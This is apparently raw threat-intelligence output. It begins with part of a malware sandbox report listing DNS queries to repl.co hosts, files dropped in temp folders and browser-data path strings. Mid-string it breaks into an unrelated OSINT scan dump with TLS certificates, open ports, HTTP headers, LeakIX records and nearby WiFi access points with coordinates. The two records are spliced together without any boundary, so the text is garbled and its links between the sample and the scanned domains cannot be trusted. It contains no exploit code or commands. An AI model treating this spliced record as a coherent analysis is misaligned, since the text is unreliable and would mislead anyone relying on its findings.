"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4284:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3152:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"2342356235.validation11.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4284_441219492\\Part-RU]- [targetUID: 00000000-00004284]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"21a0124d-0d02-45d1-8dc5-b45898592ebc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\21a0124d-0d02-45d1-8dc5-b45898592ebc.tmp]- [targetUID: 00000000-00004284]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004284]\n "4112255d-5bff-4b82-800f-8599cc70a083.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4112255d-5bff-4b82-800f-8599cc70a083.tmp]- [targetUID: 00000000-00004284]\n "c4185f90-bf7a-4c53-893c-ae755caf73f0.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\c4185f90-bf7a-4c53-893c-ae755caf73f0.tmp]- [targetUID: 00000000-00004284]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\4284_441219492\\Part-NL]- [targetUID: 00000000-00004284]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\4284_1466836764\\safety_tips.pb]- [targetUID: 00000000-00004284]\n "e3c0ea58-0176-44ff-8693-823909415e07.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e3c0ea58-0176-44ff-8693-823909415e07.tmp]- [targetUID: 00000000-00004284]\n "9123dd16-6fb7-4bc0-b876-bc0f9b519290.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\9123dd16-6fb7-4bc0-b876-bc0f9b519290.tmp]- [targetUID: 00000000-00004284]\n "2f74efab-6609-4cd8-a6d1-088065e680dd.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\2f74efab-6609-4cd8-a6d1-088065e680dd.tmp]- [targetUID: 00000000-00002880]\n "f5cce5a2-0bbc-4ebc-bd45-f65e1bfd1625.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f5cce5a2-0bbc-4ebc-bd45-f65e1bfd1625.tmp]- [targetUID: 00000000-00004284]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\4284_1466836764\\_metadata\\verified_contents.json]- [targetUID: 00000000-00004284]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00004284]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Autofill\\3.0.0.3\\manifest.json]- [targetUID: 00000000-00004284]\n "cb8d8150-2896-4d02-91b8-2cd64521bc9e.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\cb8d8150-2896-4d02-91b8-2cd64521bc9e.tmp]- [targetUID: 00000000-00004284]\n "shopping.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.html]- [targetUID: 00000000-00004284]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\LOG]- [targetUID: 00000000-00004284]\n "edge_tracking_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4284_1369484392\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004284]\n "Variations" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00004284]\n "Part-IT" has type "data"- Location: [%TEMP%\\4284_441219492\\Part-IT]- [targetUID: 00000000-00004284]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://t.co/xvbk0RkXiK"\n Pattern match: "https://t.co"\n Heuristic match: "2342356235.validation11.repl.co"\n Heuristic match: "234__5G_35va|_datlol111.rep|.co"\n Heuristic match: "1.repl.co"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004284]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\4284_441219492\\adblock_snippet.js]- [targetUID: 00000000-00004284]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\4284_1369484392\\shopping_iframe_driver.js]- [targetUID: 00000000-00004284]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\4284_1369484392\\shoppingfre.js]- [targetUID: 00000000-00004284]\n Dropped file: "product_page.js" - Location: [%TEMP%\\4284_1369484392\\product_page.js]- [targetUID: 00000000-00004284]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\4284_1369484392\\auto_open_controller.js]- [targetUID: 00000000-00004284]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004284]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\4284_1369484392\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004284]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4284_441219492\\Part-RU]- [targetUID: 00000000-00004284]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004284-00000BE4-10923916685\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004284-00000BE4-11564684951\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (I 34.149.204.188 2022-12-18 00:16:57 Linked URL - Internal No Web Spider 5 0 2 0 None http://webmail.zerotwo-best-waifu.online/ webmail.zerotwo-best-waifu.online 2022-12-18 00:21:51 Open TCP Port No Censys 0 0 2 0 None 172.67.137.37:2053 172.67.137.37 2022-12-18 00:21:30 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b111e70f46faf6-DUS Content-Encoding: gzip 172.67.190.129 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None GOAT (Net ID: 00:00:C5:D3:87:1C) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None matrix (Net ID: 00:02:2D:03:92:64) 37.7803446,-122.3906132 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) 37.780462,-122.390564 2022-12-18 00:03:03 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.103 90.116.166.104 2022-12-18 00:09:33 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.11:8443 188.114.96.0/24 2022-12-18 00:03:48 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 03:e2:2d:48:dd:4c:ac:71:43:1c:ff:e5:61:16:60:4c:1f:a4 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Oct 26 15:30:18 2020 GMT Not After : Jan 24 15:30:18 2021 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:eb:43:89:5d:2a:2b:fb:94:8a:04:2c:02:af:2a: 96:5b:3f:07:89:51:76:35:bf:db:b4:27:c7:db:3b: 22:5b:13:e2:bb:1a:ef:bd:f3:63:62:e1:9a:41:57: c7:e1:64:a6:3c:fb:73:f3:7e:8b:92:8b:36:7d:f5: 90:ef:19:3e:2a:70:e3:b1:1d:a8:a5:10:14:d9:44: 1e:e2:d1:86:fe:ed:a0:95:8f:1e:1f:b8:a0:64:8a: 03:2e:24:de:da:18:02:31:72:4c:bc:08:b8:b9:7d: 37:68:59:71:ff:34:47:3a:f5:31:0a:7b:e3:d7:a4: 57:9a:28:af:cb:cb:02:23:42:43:84:37:4b:43:a3: 7c:16:14:5c:c2:31:5d:41:8d:54:c0:19:2e:fc:1a: 1e:00:56:d0:6f:f0:7b:c7:06:ee:1d:32:f2:21:a6: 9b:2e:bf:1e:72:64:69:22:a6:bd:c9:5c:55:eb:28: 7f:90:ac:ce:a3:a0:3c:70:26:56:e2:ce:7e:0a:78: 11:31:a1:34:1f:1e:da:ce:6d:10:0d:02:88:dc:c0: 6a:29:a9:37:1f:9f:89:b4:a9:22:a8:7c:2d:4a:8f: a5:88:bf:b8:15:de:16:82:69:48:6c:4a:f5:1e:ac: 25:5f:c9:ac:67:4a:56:29:88:80:5a:e0:c0:f1:e2: 75:07 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:0D:67:35:38:EF:6A:3B:4A:2F:E7:A1:89:80:E8:46:87:08:00:70 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 5C:DC:43:92:FE:E6:AB:45:44:B1:5E:9A:D4:56:E6:10: 37:FB:D5:FA:47:DC:A1:73:94:B2:5E:E6:F6:C7:0E:CA Timestamp : Oct 26 16:30:18.641 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DC:B4:89:A6:A0:5A:ED:1D:B3:AC:CD: 37:B3:A5:79:03:9A:43:47:AA:C4:6A:A8:48:B1:EF:C0: 78:B9:66:89:F8:02:21:00:B9:0C:81:17:71:73:95:B5: E7:1B:DB:ED:99:E8:D3:34:03:49:96:28:B5:3C:79:35: C1:94:17:A7:68:1C:86:8C Signed Certificate Timestamp: Version : v1 (0x0) Log ID : F6:5C:94:2F:D1:77:30:22:14:54:18:08:30:94:56:8E: E3:4D:13:19:33:BF:DF:0C:2F:20:0B:CC:4E:F1:64:E3 Timestamp : Oct 26 16:30:18.636 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:BC:11:DA:30:F8:B8:98:A2:8C:8B:4A: 66:E7:72:D4:1A:B7:FE:23:52:9B:59:4E:5B:68:10:A3: 32:CF:C7:4C:64:02:20:7D:D2:42:BF:15:1A:72:F7:66: 5B:D2:BB:19:EC:65:6A:8D:8C:C5:58:E5:16:14:C9:AA: 31:43:2C:F4:27:B0:89 Signature Algorithm: sha256WithRSAEncryption 65:59:4e:b2:06:fd:8c:80:fc:73:c0:96:54:e5:4e:b4:1b:25: 3d:76:a2:a7:bf:93:6e:2f:88:a4:39:ba:88:69:b8:f7:72:57: f5:81:77:be:6a:1b:cb:ab:d2:cc:b4:26:2f:34:2d:60:2d:fa: 7f:45:1d:72:b4:4a:39:a9:9f:7c:44:6a:07:34:0c:fd:f5:d4: fa:57:f3:6e:29:4b:a4:23:6f:7f:f1:2b:1b:ad:af:a8:99:93: 2b:8a:0e:1a:84:37:e2:2f:d7:fa:42:8e:72:4b:1b:33:23:5a: a6:a0:3a:db:2d:73:62:ba:62:6e:41:99:3f:fd:e8:43:d1:8a: 26:38:34:21:d6:b3:af:50:0d:de:5d:be:c5:f5:64:a4:b7:89: 67:60:6d:a9:ee:37:6f:90:e8:fb:e5:8b:68:b9:de:e0:d3:e0: 91:78:e9:96:57:9e:90:3c:08:40:95:cd:1e:b1:15:90:b4:79: d9:1e:e6:d3:bd:aa:2a:bb:24:bd:05:6a:2f:ed:59:e8:f8:10: 1b:7b:d1:a2:d6:4b:33:2a:5b:de:da:37:47:49:94:89:3d:91: 2a:35:3c:ac:3d:59:f3:96:be:fd:6d:bb:7e:75:d6:1f:de:07: 57:d2:c6:25:df:12:cf:c8:e2:e8:ba:12:78:d6:5a:99:40:19: c1:6a:2d:2c plague.fun 2022-12-18 00:02:45 SSL Certificate - Raw Data No CertSpotter 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:3b:c1:da:8c:2d:8d:3c:49:c8:fb:3d:44:b5:c2:87:b4:3a Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Sep 20 20:09:20 2022 GMT Not After : Dec 19 20:09:19 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:9e:35:88:49:0b:b7:05:fb:30:39:91:2c:a4:c8: 3d:37:20:a3:92:d0:d2:11:82:4f:c7:bd:e3:16:9d: be:3d:3f:14:1f:c4:fd:44:00:d3:22:0e:0a:15:80: 32:c2:39:da:b8:ae:34:4f:14:01:a5:16:f7:6e:eb: 30:0a:c1:cc:d2 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 88:24:DF:9C:20:E2:63:56:23:30:02:EA:37:31:97:44:FC:90:64:46 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 41:C8:CA:B1:DF:22:46:4A:10:C6:A1:3A:09:42:87:5E: 4E:31:8B:1B:03:EB:EB:4B:C7:68:F0:90:62:96:06:F6 Timestamp : Sep 20 21:09:20.492 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:20:4B:FA:2E:39:B5:4A:7E:1E:99:95:86:B9: B3:8A:E4:80:9D:CD:AB:17:D7:B7:40:4F:C3:9B:ED:54: 24:9C:11:BD:02:21:00:FD:45:FB:F2:A1:3E:CD:E8:A2: CC:34:29:02:72:8C:EB:99:C0:CA:A0:21:99:F7:A1:5B: C1:74:A7:32:F7:42:7F Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 29:79:BE:F0:9E:39:39:21:F0:56:73:9F:63:A5:77:E5: BE:57:7D:9C:60:0A:F8:F9:4D:5D:26:5C:25:5D:C7:84 Timestamp : Sep 20 21:09:20.448 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:FC:14:96:0B:ED:FC:D9:C5:2A:9E:6F: 52:EE:C7:06:D0:67:B9:01:DA:56:7D:5C:92:2F:10:76: DF:F1:5D:90:3E:02:21:00:B4:D1:00:98:21:12:BC:2A: 54:52:F2:E6:8B:33:79:69:58:57:C6:67:70:5C:DA:3B: E7:67:04:E5:84:09:7B:A8 Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:0c:9f:02:9e:a6:3f:cd:3b:85:32:2b:49:96:f2: 00:58:fd:40:65:de:b9:94:b5:11:ef:8a:23:0c:07:ec:f5:75: 18:07:07:24:15:e7:ea:8b:b4:36:77:75:83:eb:b0:3e:02:30: 2d:3e:43:61:54:0c:77:dc:17:fe:4d:45:de:d3:ad:b2:35:a2: 15:2e:45:32:25:68:c3:f7:9c:53:f8:b9:69:7b:8a:0e:27:5e: 8e:8c:9c:98:c5:ad:33:67:02:7f:98:09 misogyny.wtf 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ae8278c9706174-ORD"]} 188.114.97.1 2022-12-18 00:23:29 Internet Name No DNS Raw Records 0 0 2 0 None zerotwo-best-waifu.online www.zerotwo-best-waifu.online 2022-12-18 00:04:24 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:2f:49:07:90:93:a8:06:e6:05:0c:26:40:50:ef:77:d7:82 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 16:58:02 2022 GMT Not After : Sep 23 16:58:01 2022 GMT Subject: CN=api.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a7:42:04:24:5f:8a:a1:8e:2a:9b:a7:b7:21:0d: a4:62:c8:51:a7:ef:52:40:c8:b5:22:04:eb:5e:8e: 25:d1:44:39:60:05:3e:fb:b9:da:dd:20:85:a9:ea: 54:8d:e2:8f:7c:be:ee:ab:ac:3e:d0:47:4d:7a:58: c4:55:85:fe:80:9b:a8:f2:35:2b:e8:90:54:7e:a1: 7b:0b:62:68:28:70:70:73:be:8e:ca:f3:45:fd:69: 71:33:d8:f2:63:fa:32:9f:a0:84:f5:07:62:63:b8: e8:92:c6:0a:ee:83:9b:26:52:0f:db:a7:0d:05:dd: ed:89:e7:52:91:7d:75:09:d1:34:a8:1d:f5:9e:54: 05:44:af:1f:65:ff:3f:72:7b:89:3a:e1:5e:60:fb: dd:c7:b7:00:dc:e2:58:d6:bc:db:84:6f:37:85:d7: 64:56:f8:ec:73:07:db:33:23:fb:b0:f2:26:2c:a5: 9f:72:c5:f1:51:16:a3:bc:8d:99:9c:f4:7a:b5:18: 7a:21:00:1a:14:0f:eb:75:c7:9b:65:14:6d:c3:ca: 92:cb:2d:35:45:05:0b:26:01:ec:ec:cc:55:4b:57: 38:28:c0:0c:ce:7c:90:a0:9e:77:81:bd:d8:44:50: 93:c4:b3:06:22:00:23:c7:f0:38:45:c6:33:2f:47: ec:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 37:FE:FE:AC:E2:AA:BE:88:2E:59:E7:E5:2B:89:3F:69:6E:86:54:39 X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:api.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 46:A5:55:EB:75:FA:91:20:30:B5:A2:89:69:F4:F3:7D: 11:2C:41:74:BE:FD:49:B8:85:AB:F2:FC:70:FE:6D:47 Timestamp : Jun 25 17:58:02.924 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:2A:33:D6:FB:DC:3B:23:AE:6E:B7:B1:F2: F4:71:1F:A7:53:03:88:8C:0B:95:75:4E:6F:47:92:A2: F5:6E:CE:1C:02:20:33:50:11:B4:57:ED:06:D5:4B:0F: 06:CD:E7:79:0E:D0:12:44:99:8B:8A:FA:26:84:5C:38: BF:F0:06:AB:43:15 Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 6F:53:76:AC:31:F0:31:19:D8:99:00:A4:51:15:FF:77: 15:1C:11:D9:02:C1:00:29:06:8D:B2:08:9A:37:D9:13 Timestamp : Jun 25 17:58:03.082 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:14:34:5F:52:F3:61:E8:F1:08:A8:84:EC: E2:88:06:E9:5F:A1:0C:70:63:5A:C2:64:4C:06:61:2B: FD:3C:D8:B4:02:20:22:13:97:E8:81:E2:5B:2A:71:5E: 35:FE:02:C5:89:E9:C1:07:29:6D:E8:0E:98:CE:E3:CC: 8E:21:20:20:F3:A4 Signature Algorithm: sha256WithRSAEncryption 52:8e:92:7f:f4:4c:11:de:d4:13:64:4d:85:56:ba:d6:09:84: 44:50:7e:cb:51:b1:b9:86:82:39:17:84:60:36:40:de:b4:2d: bd:f5:7d:13:9e:15:8b:3a:21:41:88:c7:3a:c1:2c:87:b6:e9: 03:53:f1:4b:65:8d:5a:4f:22:bb:a3:87:3b:cd:ed:50:46:83: 89:e2:9c:10:a5:4e:08:c6:11:2f:ff:ad:73:d8:bc:dd:ba:01: 53:6c:af:1a:3d:5d:46:36:20:4e:12:f6:b9:03:a6:37:0a:60: 29:02:20:b8:65:b6:90:85:65:b0:10:50:ec:bd:80:b9:7d:ed: cc:96:8a:96:dd:65:fa:3f:54:1c:61:6f:43:2e:c7:6d:de:52: 5c:e6:a5:29:b5:e6:ce:2b:5b:44:03:cb:cf:3b:c4:56:98:74: ec:81:6c:bd:cc:3a:43:e3:85:ad:c9:a4:4b:69:cb:c5:70:24: be:00:3c:14:1e:e3:29:a0:d4:0b:df:6d:26:46:1b:48:cf:42: 87:0d:3d:cf:e5:54:70:9e:98:86:3b:ba:09:20:44:c1:d0:39: 57:60:09:30:b5:39:47:db:32:ad:91:0a:f3:15:da:af:3a:81: de:a7:0b:32:4a:ef:6f:5d:69:03:a6:23:3d:aa:12:c5:c2:33: ee:ee:b6:86 plague.fun 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77aa9e427dd26384-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.0 2022-12-18 00:16:27 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.97.3:443 188.114.97.3 2022-12-18 00:18:19 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.7:443 188.114.97.0/24 2022-12-18 00:02:53 IP Address No Mnemonic PassiveDNS 205 0 1 0 None 34.149.204.188 rasputain.fr 2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.160.0/20 2022-12-18 00:09:43 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68c8340df94e2d7366203c8ad0', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://webmail.nitrowe.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'webmail.nitrowe.com', u'summary': u'Date: Fri, 04 Nov 2022 13:59:03 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Fri, 04 Nov 2022 14:59:03 GMT\r\nLocation: https://webmail.nitrowe.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=BA1Vid9dVmpKA8%2BG3ftmtWNscgMs8xMH9Mle4NZR7mUzuHnxITKk582C9dTsFPDYL7j4Q3hk1maVbwLOIrt5igAxQsfnTQiY2NYnmbngLAe2ffHgq%2Frssz%2FONei1iEk2CZS%2FRkxQ"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dde363c6c0ba5-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-04T13:59:03.151987198Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': 